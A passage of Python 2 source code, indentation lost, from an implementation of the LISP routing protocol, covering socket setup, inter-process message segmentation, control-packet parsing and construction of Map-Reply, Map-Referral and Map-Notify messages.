self.global_ms_rloc.mask_len = self.global_ms_rloc.host_mask_len()
#endif
#
# Get private ETR RLOC address.
#
if (len(packet) < format_size): return(orig_packet)
afi = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
if (afi != 0):
self.private_etr_rloc.afi = socket.ntohs(afi)
packet = self.private_etr_rloc.unpack_address(packet)
if (packet == None): return(orig_packet)
self.private_etr_rloc.mask_len = \
self.private_etr_rloc.host_mask_len()
#endif
#
# Get RTR list if any.
#
while (len(packet) >= format_size):
afi = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
if (afi == 0): continue
rtr = lisp_address(socket.ntohs(afi), "", 0, 0)
packet = rtr.unpack_address(packet)
if (packet == None): return(orig_packet)
rtr.mask_len = rtr.host_mask_len()
self.rtr_list.append(rtr)
#endwhile
return(orig_packet)
#enddef
#endclass
class lisp_nat_info():
def __init__(self, addr_str, hostname, port):
self.address = addr_str
self.hostname = hostname
self.port = port
self.uptime = lisp_get_timestamp()
#enddef
def timed_out(self):
elapsed = time.time() - self.uptime
return(elapsed >= (LISP_INFO_INTERVAL * 2))
#enddef
#endclass
class lisp_info_source():
def __init__(self, hostname, addr_str, port):
self.address = lisp_address(LISP_AFI_IPV4, addr_str, 32, 0)
self.port = port
self.uptime = lisp_get_timestamp()
self.nonce = None
self.hostname = hostname
self.no_timeout = False
#enddef
def cache_address_for_info_source(self):
key = self.address.print_address_no_iid() + self.hostname
lisp_info_sources_by_address[key] = self
#enddef
def cache_nonce_for_info_source(self, nonce):
self.nonce = nonce
lisp_info_sources_by_nonce[nonce] = self
#enddef
#endclass
#------------------------------------------------------------------------------
#
# lisp_concat_auth_data
#
# Take each longword and convert to binascii by byte-swapping and zero filling
# longword that leads with 0.
#
def lisp_concat_auth_data(alg_id, auth1, auth2, auth3, auth4):
if (lisp_is_x86()):
if (auth1 != ""): auth1 = byte_swap_64(auth1)
if (auth2 != ""): auth2 = byte_swap_64(auth2)
if (auth3 != ""):
if (alg_id == LISP_SHA_1_96_ALG_ID): auth3 = socket.ntohl(auth3)
else: auth3 = byte_swap_64(auth3)
#endif
if (auth4 != ""): auth4 = byte_swap_64(auth4)
#endif
if (alg_id == LISP_SHA_1_96_ALG_ID):
auth1 = lisp_hex_string(auth1)
auth1 = auth1.zfill(16)
auth2 = lisp_hex_string(auth2)
auth2 = auth2.zfill(16)
auth3 = lisp_hex_string(auth3)
auth3 = auth3.zfill(8)
auth_data = auth1 + auth2 + auth3
#endif
if (alg_id == LISP_SHA_256_128_ALG_ID):
auth1 = lisp_hex_string(auth1)
auth1 = auth1.zfill(16)
auth2 = lisp_hex_string(auth2)
auth2 = auth2.zfill(16)
auth3 = lisp_hex_string(auth3)
auth3 = auth3.zfill(16)
auth4 = lisp_hex_string(auth4)
auth4 = auth4.zfill(16)
auth_data = auth1 + auth2 + auth3 + auth4
#endif
return(auth_data)
#enddef
#
# lisp_open_listen_socket
#
# Open either internal socket or network socket. If network socket, it will
# open it with a local address of 0::0 which means the one socket can be
# used for IPv4 or IPv6. This is goodness and reduces the number of threads
# required.
#
def lisp_open_listen_socket(local_addr, port):
if (port.isdigit()):
if (local_addr.find(".") != -1):
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
#endif
if (local_addr.find(":") != -1):
if (lisp_is_raspbian()): return(None)
sock = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
#endif
sock.bind((local_addr, int(port)))
else:
name = port
if (os.path.exists(name)):
os.system("rm " + name)
time.sleep(1)
#endif
sock = socket.socket(socket.AF_UNIX, socket.SOCK_DGRAM)
sock.bind(name)
#endif
return(sock)
#enddef
#
# lisp_open_send_socket
#
# Open socket for sending to port 4342.
#
def lisp_open_send_socket(internal_name, afi):
if (internal_name == ""):
if (afi == LISP_AFI_IPV4):
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
#endif
if (afi == LISP_AFI_IPV6):
if (lisp_is_raspbian()): return(None)
sock = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
#endif
else:
if (os.path.exists(internal_name)): os.system("rm " + internal_name)
sock = socket.socket(socket.AF_UNIX, socket.SOCK_DGRAM)
sock.bind(internal_name)
#endif
return(sock)
#enddef
#
# lisp_close_socket
#
# Close network and internal sockets.
#
def lisp_close_socket(sock, internal_name):
sock.close()
if (os.path.exists(internal_name)): os.system("rm " + internal_name)
return
#endif
#
# lisp_is_running
#
# Test if one of "lisp-itr", "lisp-etr", "lisp-mr", "lisp-ms", "lisp-ddt", or
# "lisp-core" is running.
#
def lisp_is_running(node):
return(True if (os.path.exists(node)) else False)
#enddef
#
# lisp_packet_ipc
#
# Build IPC message for a LISP control packet destined for UDP port 4342. This
# packet goes to the lisp-core process and then it IPCs it to the appropriate
# LISP component process.
#
def lisp_packet_ipc(packet, source, sport):
return(("packet@" + str(len(packet)) + "@" + source + "@" + str(sport) + \
"@" + packet))
#enddef
#
# lisp_control_packet_ipc
#
# Build IPC message for a packet that needs to be source from UDP port 4342.
# Always sent by a LISP component process to the lisp-core process.
#
def lisp_control_packet_ipc(packet, source, dest, dport):
return("control-packet@" + dest + "@" + str(dport) + "@" + packet)
#enddef
#
# lisp_data_packet_ipc
#
# Build IPC message for a MAC, IPv4, or IPv6 data packet.
#
def lisp_data_packet_ipc(packet, source):
return("data-packet@" + str(len(packet)) + "@" + source + "@@" + packet)
#enddef
#
# lisp_command_ipc
#
# Build IPC message for a command message. Note this command IPC message must
# have same number of parameters as the "packet@" IPC. So an intentional
# double @ is put in after the source to indicate a null port.
#
def lisp_command_ipc(packet, source):
return("command@" + str(len(packet)) + "@" + source + "@@" + packet)
#enddef
#
# lisp_api_ipc
#
# Build IPC message for a command message. Note this command IPC message must
# have same number of parameters as the "packet@" IPC. So an intentional
# double @ is put in after the source to indicate a null port.
#
def lisp_api_ipc(source, data):
return("api@" + str(len(data)) + "@" + source + "@@" + data)
#enddef
#
# lisp_ipc
#
# Send IPC message to internal AF_UNIX socket if LISP component is running. We
# need to send in 15000 byte segments since the socket interface will not allow
# to support more. And socket.setsockopt() won't alow to increase SO_SNDBUF.
#
def lisp_ipc(packet, send_socket, node):
#
# Can't send an IPC message to a process that is not running.
#
if (lisp_is_running(node) == False):
lprint("Suppress sending IPC to {}".format(node))
return
#endif
ipc_len = 1500 if (packet.find("control-packet") == -1) else 9000
offset = 0
length = len(packet)
retry_count = 0
sleep_time = .001
while (length > 0):
segment_len = min(length, ipc_len)
segment = packet[offset:segment_len+offset]
try:
send_socket.sendto(segment, node)
lprint("Send IPC {}-out-of-{} byte to {} succeeded".format( \
len(segment), len(packet), node))
retry_count = 0
sleep_time = .001
except socket.error, e:
if (retry_count == 12):
lprint("Giving up on {}, consider it down".format(node))
break
#endif
lprint("Send IPC {}-out-of-{} byte to {} failed: {}".format( \
len(segment), len(packet), node, e))
retry_count += 1
time.sleep(sleep_time)
lprint("Retrying after {} ms ...".format(sleep_time * 1000))
sleep_time *= 2
continue
#endtry
offset += segment_len
length -= segment_len
#endwhile
return
#enddef
#
# lisp_format_packet
#
# Put a whitespace between every 4 bytes of a packet dump.
#
def lisp_format_packet(packet):
packet = binascii.hexlify(packet)
offset = 0
new = ""
length = len(packet) * 2
while (offset < length):
new += packet[offset:offset+8] + " "
offset += 8
length -= 4
#endfor
return(new)
#enddef
#
# lisp_send
#
# Send packet out.
#
def lisp_send(lisp_sockets, dest, port, packet):
lisp_socket = lisp_sockets[0] if dest.is_ipv4() else lisp_sockets[1]
#
# Remove square brackets. Use an IPv4 socket when address is IPv4, even
# when embedded in ::ffff:<ipv4-address>. This is a special case when
# an RTR sits behind a NAT and is sending a Map-Request. The ECM and
# Map-Request need to use the same ephemeral port and the Map-Reply
# needs to come to the ephemeral listening socket lisp_sockets[0];
#
# Also, on getchip and raspberry-pi OSes, there is no support for IPv6
# sockets, so we need to use the IPv4 embedded address and the IPv4
# socket.
#
address = dest.print_address_no_iid()
if (address.find("::ffff:") != -1 and address.count(".") == 3):
if (lisp_i_am_rtr): lisp_socket = lisp_sockets[0]
if (lisp_socket == None):
lisp_socket = lisp_sockets[0]
address = address.split("::ffff:")[-1]
#endif
#endif
lprint("{} {} bytes {} {}, packet: {}".format(bold("Send", False),
len(packet), bold("to " + address, False), port,
lisp_format_packet(packet)))
#
# If Map-Request/Reply RLOC-probe set TTL for outgoing packet to 255.
#
set_ttl = (LISP_RLOC_PROBE_TTL == 255)
if (set_ttl):
lisp_type = struct.unpack("B", packet[0])[0]
set_ttl = (lisp_type in [0x12, 0x28])
if (set_ttl): lisp_set_ttl(lisp_socket, LISP_RLOC_PROBE_TTL)
#endif
try: lisp_socket.sendto(packet, (address, port))
except socket.error, e:
lprint("socket.sendto() failed: {}".format(e))
#endtry
#
# Set back to default TTL.
#
if (set_ttl): lisp_set_ttl(lisp_socket, 64)
return
#enddef
#
# lisp_receive_segments
#
# Process 1500 byte segments if received IPC packet greater than what sockets
# can support.
#
def lisp_receive_segments(lisp_socket, packet, source, total_length):
#
# If the total length is equal to the segment length. We only have one
# segment which is the packet. Return it.
#
segment_len = total_length - len(packet)
if (segment_len == 0): return([True, packet])
lprint("Received {}-out-of-{} byte segment from {}".format(len(packet),
total_length, source))
#
# Otherwise, receive each segment and assemble it to return entire packet
# to caller.
#
length = segment_len
while (length > 0):
try: segment = lisp_socket.recvfrom(9000)
except: return([False, None])
segment = segment[0]
#
# The sender gave up and sent a new message that made it to us, last
# partial packet must be dropped.
#
if (segment.find("packet@") == 0):
seg = segment.split("@")
lprint("Received new message ({}-out-of-{}) while receiving " + \
"fragments, old message discarded", len(segment),
seg[1] if len(seg) > 2 else "?")
return([False, segment])
#endif
length -= len(segment)
packet += segment
lprint("Received {}-out-of-{} byte segment from {}".format( \
len(segment), total_length, source))
#endwhile
return([True, packet])
#enddef
#
# lisp_bit_stuff
#
# For every element in the array, insert a 0x40 ("@"). This is a bit-stuffing
# procedure. Only look array elemsnts with index 2 and above.
#
def lisp_bit_stuff(payload):
lprint("Bit-stuffing, found {} segments".format(len(payload)))
packet = ""
for segment in payload: packet += segment + "\x40"
return(packet[:-1])
#enddef
#
# lisp_receive
#
# Wait for packet to come in. This function call will block. For command
# IPCs, we need to loop to assemble all segments.
#
# For an internal socket, the format of a recvfrom() 'packet-data' is:
#
# "command" @ <total-length> @ <source> @ <packet-buffer>
# "packet" @ <total-length> @ <source> @ <command-buffer>
#
# So when an array of length 4 does not exist, we are receiving a fragment.
#
# For an external network socket, the format of a recvfrom() is:
#
# packet_data[0] = <packet-buffer>
# packet_data[1] = [<source>, <port>]
#
def lisp_receive(lisp_socket, internal):
while (True):
#
# Read from socket. Return if we received an error.
#
try: packet_data = lisp_socket.recvfrom(9000)
except: return(["", "", "", ""])
#
# This is a packet received on the network. If it was fragmented at the
# sender, then IP did it so it is assebled into a complete datagram
# in this sytem.
#
if (internal == False):
packet = packet_data[0]
source = lisp_convert_6to4(packet_data[1][0])
port = packet_data[1][1]
if (port == LISP_DATA_PORT):
do_log = lisp_data_plane_logging
packet_str = lisp_format_packet(packet[0:60]) + " ..."
else:
do_log = True
packet_str = lisp_format_packet(packet)
#endif
if (do_log):
lprint("{} {} bytes {} {}, packet: {}".format(bold("Receive",
False), len(packet), bold("from " + source, False), port,
packet_str))
#endif
return(["packet", source, port, packet])
#endif
#
# This is an IPC message that can be fragmented by lisp-core or the
# sending socket interface.
#
assembled = False
data = packet_data[0]
loop = False
while (assembled == False):
data = data.split("@")
if (len(data) < 4):
lprint("Possible fragment (length {}), from old message, " + \
"discarding", len(data[0]))
loop = True
break
#endif
opcode = data[0]
try:
total_length = int(data[1])
except:
error_str = bold("Internal packet reassembly error", False)
lprint("{}: {}".format(error_str, packet_data))
loop = True
break
#endtry
source = data[2]
port = data[3]
#
# If any of the data payload has a 0x40 byte (which is "@" in
# ascii), we will confuse the IPC separator from real data.
# So go to the payload and put in 0x40 where split() seperated
# the data. This particularly happens with Map-Notify messages
# since the first byte of the message is 0x40.
#
if (len(data) > 5):
packet = lisp_bit_stuff(data[4::])
else:
packet = data[4]
#endif
#
# Check for reassembly. Once reassembled, then we can process one
# large packet.
#
assembled, packet = lisp_receive_segments(lisp_socket, packet,
source, total_length)
if (packet == None): return(["", "", "", ""])
#
# We did not finish assembling a message but the sender sent a new
# one.
#
if (assembled == False):
data = packet
continue
#endif
if (port == ""): port = "no-port"
if (opcode == "command" and lisp_i_am_core == False):
index = packet.find(" {")
command = packet if index == -1 else packet[:index]
command = ": '" + command + "'"
else:
command = ""
#endif
lprint("{} {} bytes {} {}, {}{}".format(bold("Receive", False),
len(packet), bold("from " + source, False), port, opcode,
command if (opcode in ["command", "api"]) else ": ... " if \
(opcode == "data-packet") else \
": " + lisp_format_packet(packet)))
#endif
#endwhile
if (loop): continue
return([opcode, source, port, packet])
#endwhile
#enddef
#
# lisp_parse_packet
#
# Parse LISP control message.
#
def lisp_parse_packet(lisp_sockets, packet, source, udp_sport, ttl=-1):
trigger_flag = False
header = lisp_control_header()
if (header.decode(packet) == None):
lprint("Could not decode control header")
return(trigger_flag)
#endif
#
# Store source in internal lisp_address() format.
#
from_ipc = source
if (source.find("lisp") == -1):
s = lisp_address(LISP_AFI_NONE, "", 0, 0)
s.string_to_afi(source)
s.store_address(source)
source = s
#endif
if (header.type == LISP_MAP_REQUEST):
lisp_process_map_request(lisp_sockets, packet, None, 0, source,
udp_sport, False, ttl)
elif (header.type == LISP_MAP_REPLY):
lisp_process_map_reply(lisp_sockets, packet, source, ttl)
elif (header.type == LISP_MAP_REGISTER):
lisp_process_map_register(lisp_sockets, packet, source, udp_sport)
elif (header.type == LISP_MAP_NOTIFY):
if (from_ipc == "lisp-etr"):
lisp_process_multicast_map_notify(packet, source)
else:
if (lisp_is_running("lisp-rtr")):
lisp_process_multicast_map_notify(packet, source)
#endif
lisp_process_map_notify(lisp_sockets, packet, source)
#endif
elif (header.type == LISP_MAP_NOTIFY_ACK):
lisp_process_map_notify_ack(packet, source)
elif (header.type == LISP_MAP_REFERRAL):
lisp_process_map_referral(lisp_sockets, packet, source)
elif (header.type == LISP_NAT_INFO and header.is_info_reply()):
x, y, trigger_flag = lisp_process_info_reply(source, packet, True)
elif (header.type == LISP_NAT_INFO and header.is_info_reply() == False):
addr_str = source.print_address_no_iid()
lisp_process_info_request(lisp_sockets, packet, addr_str, udp_sport,
None)
elif (header.type == LISP_ECM):
lisp_process_ecm(lisp_sockets, packet, source, udp_sport)
else:
lprint("Invalid LISP control packet type {}".format(header.type))
#endif
return(trigger_flag)
#enddef
#
# lisp_process_rloc_probe_request
#
# Process Map-Request with RLOC-probe bit set.
#
def lisp_process_rloc_probe_request(lisp_sockets, map_request, source, port,
ttl):
p = bold("RLOC-probe", False)
if (lisp_i_am_etr):
lprint("Received {} Map-Request, send RLOC-probe Map-Reply".format(p))
lisp_etr_process_map_request(lisp_sockets, map_request, source, port,
ttl)
return
#endif
if (lisp_i_am_rtr):
lprint("Received {} Map-Request, send RLOC-probe Map-Reply".format(p))
lisp_rtr_process_map_request(lisp_sockets, map_request, source, port,
ttl)
return
#endif
lprint("Ignoring received {} Map-Request, not an ETR or RTR".format(p))
return
#enddef
#
# lisp_process_smr
#
def lisp_process_smr(map_request):
lprint("Received SMR-based Map-Request")
return
#enddef
#
# lisp_process_smr_invoked_request
#
def lisp_process_smr_invoked_request(map_request):
lprint("Received SMR-invoked Map-Request")
return
#enddef
#
# lisp_build_map_reply
#
# Build a Map-Reply and return a packet to the caller.
#
def lisp_build_map_reply(eid, group, rloc_set, nonce, action, ttl, rloc_probe,
keys, enc, auth, mr_ttl=-1):
map_reply = lisp_map_reply()
map_reply.rloc_probe = rloc_probe
map_reply.echo_nonce_capable = enc
map_reply.hop_count = 0 if (mr_ttl == -1) else mr_ttl
map_reply.record_count = 1
map_reply.nonce = nonce
packet = map_reply.encode()
map_reply.print_map_reply()
eid_record = lisp_eid_record()
eid_record.rloc_count = len(rloc_set)
eid_record.authoritative = auth
eid_record.record_ttl = ttl
eid_record.action = action
eid_record.eid = eid
eid_record.group = group
packet += eid_record.encode()
eid_record.print_record(" ", False)
local_rlocs = lisp_get_all_addresses() + lisp_get_all_translated_rlocs()
for rloc_entry in rloc_set:
rloc_record = lisp_rloc_record()
addr_str = rloc_entry.rloc.print_address_no_iid()
if (addr_str in local_rlocs):
rloc_record.local_bit = True
rloc_record.probe_bit = rloc_probe
rloc_record.keys = keys
if (rloc_entry.priority == 254 and lisp_i_am_rtr):
rloc_record.rloc_name = "RTR"
#endif
#endif
rloc_record.store_rloc_entry(rloc_entry)
rloc_record.reach_bit = True
rloc_record.print_record(" ")
packet += rloc_record.encode()
#endfor
return(packet)
#enddef
#
# lisp_build_map_referral
#
# Build a Map-Referral and return a packet to the caller.
#
def lisp_build_map_referral(eid, group, ddt_entry, action, ttl, nonce):
map_referral = lisp_map_referral()
map_referral.record_count = 1
map_referral.nonce = nonce
packet = map_referral.encode()
map_referral.print_map_referral()
eid_record = lisp_eid_record()
rloc_count = 0
if (ddt_entry == None):
eid_record.eid = eid
eid_record.group = group
else:
rloc_count = len(ddt_entry.delegation_set)
eid_record.eid = ddt_entry.eid
eid_record.group = ddt_entry.group
ddt_entry.map_referrals_sent += 1
#endif
eid_record.rloc_count = rloc_count
eid_record.authoritative = True
#
# Use action passed into this function. But if NULL, select the action
# based on the first ddt-node child type.
#
incomplete = False
if (action == LISP_DDT_ACTION_NULL):
if (rloc_count == 0):
action = LISP_DDT_ACTION_NODE_REFERRAL
else:
ddt_node = ddt_entry.delegation_set[0]
if (ddt_node.is_ddt_child()):
action = LISP_DDT_ACTION_NODE_REFERRAL
#endif
if (ddt_node.is_ms_child()):
action = LISP_DDT_ACTION_MS_REFERRAL
#endif
#endif
#endif
#
# Conditions when the incomplete bit should be set in the Map-Referral.
#
if (action == LISP_DDT_ACTION_NOT_AUTH): incomplete = True
if (action in (LISP_DDT_ACTION_MS_REFERRAL, LISP_DDT_ACTION_MS_ACK)):
incomplete = (lisp_i_am_ms and ddt_node.is_ms_peer() == False)
#endif
eid_record.action = action
eid_record.ddt_incomplete = incomplete
eid_record.record_ttl = ttl
packet += eid_record.encode()
eid_record.print_record(" ", True)
if (rloc_count == 0): return(packet)
for ddt_node in ddt_entry.delegation_set:
rloc_record = lisp_rloc_record()
rloc_record.rloc = ddt_node.delegate_address
rloc_record.priority = ddt_node.priority
rloc_record.weight = ddt_node.weight
rloc_record.mpriority = 255
rloc_record.mweight = 0
rloc_record.reach_bit = True
packet += rloc_record.encode()
rloc_record.print_record(" ")
#endfor
return(packet)
#enddef
#
# lisp_etr_process_map_request
#
# Do ETR processing of a Map-Request.
#
def lisp_etr_process_map_request(lisp_sockets, map_request, source, sport,
ttl):
if (map_request.target_group.is_null()):
db = lisp_db_for_lookups.lookup_cache(map_request.target_eid, False)
else:
db = lisp_db_for_lookups.lookup_cache(map_request.target_group, False)
if (db): db = db.lookup_source_cache(map_request.target_eid, False)
#endif
eid_str = map_request.print_prefix()
if (db == None):
lprint("Database-mapping entry not found for requested EID {}". \
format(green(eid_str, False)))
return
#endif
prefix_str = db.print_eid_tuple()
lprint("Found database-mapping EID-prefix {} for requested EID {}". \
format(green(prefix_str, False), green(eid_str, False)))
#
# Get ITR-RLOC to return Map-Reply to.
#
itr_rloc = map_request.itr_rlocs[0]
if (itr_rloc.is_private_address() and lisp_nat_traversal):
itr_rloc = source
#endif
nonce = map_request.nonce
enc = lisp_nonce_echoing
keys = map_request.keys
db.map_replies_sent += 1
packet = lisp_build_map_reply(db.eid, db.group, db.rloc_set, nonce,
LISP_NO_ACTION, 1440, map_request.rloc_probe, keys, enc, True, ttl)
#
# If we are sending a RLOC-probe Map-Reply to an RTR, data encapsulate it.
# If we are getting RLOC-probe Map-Requests from an xTR behind a NAT, and
# we are an ETR not behind a NAT, we want return the RLOC-probe Map-Reply
# to the swapped control ports.
#
# We could be getting a RLOC-probe from an xTR that is behind the same
# NAT as us. So do not data encapsulate the RLOC-probe reply.
#
# There is a special hack here. If the sport is 0, this RLOC-probe
# request is coming from an RTR. If we are doing gleaning on the RTR,
# this xTR needs to data encapsulate the RLOC-probe reply. The lisp_rtr_
# list will not be set because a gleaned xTR does not have NAT-traversal
# enabled.
#
if (map_request.rloc_probe and len(lisp_sockets) == 4):
public = (itr_rloc.is_private_address() == False)
rtr = itr_rloc.print_address_no_iid()
if ((public and lisp_rtr_list.has_key(rtr)) or sport == 0):
lisp_encapsulate_rloc_probe(lisp_sockets, itr_rloc, None, packet)
return
#endif
#endif
#
# Send to lisp-core process to send packet from UDP port 4342.
#
lisp_send_map_reply(lisp_sockets, packet, itr_rloc, sport)
return
#enddef
#
# lisp_rtr_process_map_request
#
# Do ETR processing of a Map-Request.
#
def lisp_rtr_process_map_request(lisp_sockets, map_request, source, sport,
ttl):
#
# Get ITR-RLOC to return Map-Reply to.
#
itr_rloc = map_request.itr_rlocs[0]
if (itr_rloc.is_private_address()): itr_rloc = source
nonce = map_request.nonce
eid = map_request.target_eid
group = map_request.target_group
rloc_set = []
for myrloc in [lisp_myrlocs[0], lisp_myrlocs[1]]:
if (myrloc == None): continue
rloc = lisp_rloc()
rloc.rloc.copy_address(myrloc)
rloc.priority = 254
rloc_set.append(rloc)
#endfor
enc = lisp_nonce_echoing
keys = map_request.keys
packet = lisp_build_map_reply(eid, group, rloc_set, nonce, LISP_NO_ACTION,
1440, True, keys, enc, True, ttl)
lisp_send_map_reply(lisp_sockets, packet, itr_rloc, sport)
return
#enddef
#
# lisp_get_private_rloc_set
#
# If the source-EID and target-EID of a Map-Request are behind the same NAT,
# that is, have the same global RLOC address, then return just the private
# addresses in the Map-Reply so the xTRs have shortest RLOC paths between
# each other and don't have to hair-pin through the NAT/firewall device.
#
def lisp_get_private_rloc_set(target_site_eid, seid, group):
rloc_set = target_site_eid.registered_rlocs
source_site_eid = lisp_site_eid_lookup(seid, group, False)
if (source_site_eid == None): return(rloc_set)
#
# Get global RLOC address from target site.
#
target_rloc = None
new_set = []
for rloc_entry in rloc_set:
if (rloc_entry.is_rtr()): continue
if (rloc_entry.rloc.is_private_address()):
new_rloc = copy.deepcopy(rloc_entry)
new_set.append(new_rloc)
continue
#endif
target_rloc = rloc_entry
break
#endfor
if (target_rloc == None): return(rloc_set)
target_rloc = target_rloc.rloc.print_address_no_iid()
#
# Get global RLOC address from source site.
#
source_rloc = None
for rloc_entry in source_site_eid.registered_rlocs:
if (rloc_entry.is_rtr()): continue
if (rloc_entry.rloc.is_private_address()): continue
source_rloc = rloc_entry
break
#endfor
if (source_rloc == None): return(rloc_set)
source_rloc = source_rloc.rloc.print_address_no_iid()
#
# If the xTRs are behind the same NAT, then we return private addresses.
#
site_id = target_site_eid.site_id
if (site_id == 0):
if (source_rloc == target_rloc):
lprint("Return private RLOCs for sites behind {}".format( \
target_rloc))
return(new_set)
#endif
return(rloc_set)
#endif
#
# If the xTRs are not behind the same NAT, but are configured in the
# same site-id, they can reach each other with private addresses. So
# return them in the RLOC-set.
#
if (site_id == source_site_eid.site_id):
lprint("Return private RLOCs for sites in site-id {}".format(site_id))
return(new_set)
#endif
return(rloc_set)
#enddef
#
# lisp_get_partial_rloc_set
#
# If the Map-Request source is found in the RLOC-set, return all RLOCs that
# do not have the same priority as the Map-Request source (an RTR supporting
# NAT-traversal) RLOC. Otherwise, return all RLOCs that are not priority 254.
#
def lisp_get_partial_rloc_set(registered_rloc_set, mr_source, multicast):
rtr_list = []
rloc_set = []
#
# Search the RTR list to see if the Map-Requestor is an RTR. If so,
# return the RLOC-set to the RTR so it can replicate directly to ETRs.
# Otherwise, return the RTR-list locator-set to the requesting ITR/PITR.
#
rtr_is_requestor = False
behind_nat = False
for rloc_entry in registered_rloc_set:
if (rloc_entry.priority != 254): continue
behind_nat |= True
if (rloc_entry.rloc.is_exact_match(mr_source) == False): continue
rtr_is_requestor = True
break
#endfor
#
# If we find an RTR in the RLOC-set, then the site's RLOC-set is behind
# a NAT. Otherwise, do not return a partial RLOC-set. This RLOC-set is in
# public space.
#
if (behind_nat == False): return(registered_rloc_set)
#
# An RTR can be behind a NAT when deployed in a cloud infrastructure.
# When the MS is in the same cloud infrastructure, the source address
# of the Map-Request (ECM) is not translated. So we are forced to put
# the private address in the rtr-list the MS advertises. But we should
# not return the private address in any Map-Replies. We use the private
# address in the rtr-list for the sole purpose to identify the RTR so
# we can return the RLOC-set of the ETRs.
#
ignore_private = (os.getenv("LISP_RTR_BEHIND_NAT") != None)
#
# Create two small lists. A list of RTRs which are unicast priority of
# 254 and a rloc-set which are records that are not priority 254.
#
for rloc_entry in registered_rloc_set:
if (ignore_private and rloc_entry.rloc.is_private_address()): continue
if (multicast == False and rloc_entry.priority == 255): continue
if (multicast and rloc_entry.mpriority == 255): continue
if (rloc_entry.priority == 254):
rtr_list.append(rloc_entry)
else:
rloc_set.append(rloc_entry)
#endif
#endif
#
# The RTR is sending the Map-Request.
#
if (rtr_is_requestor): return(rloc_set)
#
# An ITR is sending the Map-Request.
#
# Chcek the case where an ETR included a local RLOC and may be behind
# the same NAT as the requester. In this case, the requester can encap
# directly the private RLOC. If it is not reachable, the ITR can encap
# to the RTR. The ITR will cache a subset of the RLOC-set in this entry
# (so it can check the global RLOC first and not encap to itself).
#
rloc_set = []
for rloc_entry in registered_rloc_set:
if (rloc_entry.rloc.is_private_address()): rloc_set.append(rloc_entry)
#endfor
rloc_set += rtr_list
return(rloc_set)
#enddef
#
# lisp_store_pubsub_state
#
# Take information from Map-Request to create a pubsub cache. We remember
# the map-server lookup EID-prefix. So when the RLOC-set changes for this
# EID-prefix, we trigger a Map-Notify messate to the ITR's RLOC and port
# number.
#
def lisp_store_pubsub_state(reply_eid, itr_rloc, mr_sport, nonce, ttl, xtr_id):
pubsub = lisp_pubsub(itr_rloc, mr_sport, nonce, ttl, xtr_id)
pubsub.add(reply_eid)
return
#enddef
#
# lisp_convert_reply_to_notify
#
# In lisp_ms_process_map_request(), a proxy map-reply is built to return to
# a requesting ITR. If the requesting ITR set the N-bit in the Map-Request,
# a subscription request is being requested, return a Map-Notify so it knows
# it has been acked.
#
# This function takes a fully built Map-Reply, changes the first 4 bytes to
# make the message a Map-Notify and inserts 4-bytes of Key-ID, Alg-ID, and
# Authentication Length of 0. Then we have converted the Map-Reply into a
# Map-Notify.
#
def lisp_convert_reply_to_notify(packet):
#
# Get data we need from Map-Reply for Map-Notify.
#
record_count = struct.unpack("I", packet[0:4])[0]
record_count = socket.ntohl(record_count) & 0xff
nonce = packet[4:12]
packet = packet[12::]
#
# Build Map-Notify header.
#
first_long = (LISP_MAP_NOTIFY << 28) | record_count
header = struct.pack("I", socket.htonl(first_long))
auth = struct.pack("I", 0)
#
# Concat fields of Map-Notify.
#
packet = header + nonce + auth + packet
return(packet)
#enddef
#
# lisp_notify_subscribers
#
# There has been an RLOC-set change, inform all subscribers who have subscribed
# to this EID-prefix.
#
def lisp_notify_subscribers(lisp_sockets, eid_record, eid, site):
eid_str = eid.print_prefix()
if (lisp_pubsub_cache.has_key(eid_str) == False): return
for pubsub in lisp_pubsub_cache[eid_str].values():
itr = pubsub.itr
port = pubsub.port
itr_str = red(itr.print_address_no_iid(), False)
sub_str = bold("subscriber", False)
xtr_id = "0x" + lisp_hex_string(pubsub.xtr_id)
nonce = "0x" + lisp_hex_string(pubsub.nonce)
lprint(" Notify {} {}:{} xtr-id {} for {}, nonce {}".format( \
sub_str, itr_str, port, xtr_id, green(eid_str, False), nonce))
lisp_build_map_notify(lisp_sockets, eid_record, [eid_str], 1, itr,
port, pubsub.nonce, 0, 0, 0, site, False)
pubsub.map_notify_count += 1
#endfor
return
#enddef
#
# lisp_process_pubsub
#
# Take a fully built Map-Reply and send a Map-Notify as a pubsub ack.
#
def lisp_process_pubsub(lisp_sockets, packet, reply_eid, itr_rloc, port, nonce,
ttl, xtr_id):
#
# Store subscriber state.
#
lisp_store_pubsub_state(reply_eid, itr_rloc, port, nonce, ttl, xtr_id)
eid = green(reply_eid.print_prefix(), False)
itr = red(itr_rloc.print_address_no_iid(), False)
mn = bold("Map-Notify", False)
xtr_id = "0x" + lisp_hex_string(xtr_id)
lprint("{} pubsub request for {} to ack ITR {} xtr-id: {}".format(mn,
eid, itr, xtr_id))
#
# Convert Map-Reply to Map-Notify header and send out.
#
packet = lisp_convert_reply_to_notify(packet)
lisp_send_map_notify(lisp_sockets, packet, itr_rloc, port)
return
#enddef
#
# lisp_ms_process_map_request
#
# Do Map-Server processing of a Map-Request. Returns various LISP-DDT internal
# and external action values.
#
def lisp_ms_process_map_request(lisp_sockets, packet, map_request, mr_source,
mr_sport, ecm_source):
#
# Look up EID in site cache. If we find it and it has registered for
# proxy-replying, this map-server will send the Map-Reply. Otherwise,
# send to one of the ETRs at the registered site.
#
eid = map_request.target_eid
group = map_request.target_group
eid_str = lisp_print_eid_tuple(eid, group)
itr_rloc = map_request.itr_rlocs[0]
xtr_id = map_request.xtr_id
nonce = map_request.nonce
action = LISP_NO_ACTION
pubsub = map_request.subscribe_bit
#
# Check if we are verifying Map-Request signatures. If so, do a mapping
# database lookup on the source-EID to get public-key.
#
sig_good = True
is_crypto_hash = (lisp_get_eid_hash(eid) != None)
if (is_crypto_hash):
sig = map_request.map_request_signature
if (sig == None):
sig_good = False
lprint(("EID-crypto-hash signature verification {}, " + \
"no signature found").format(bold("failed", False)))
else:
sig_eid = map_request.signature_eid
hash_eid, pubkey, sig_good = lisp_lookup_public_key(sig_eid)
if (sig_good):
sig_good = map_request.verify_map_request_sig(pubkey)
else:
lprint("Public-key lookup failed for sig-eid {}, hash-eid {}".\
format(sig_eid.print_address(), hash_eid.print_address()))
#endif
pf = bold("passed", False) if sig_good else bold("failed", False)
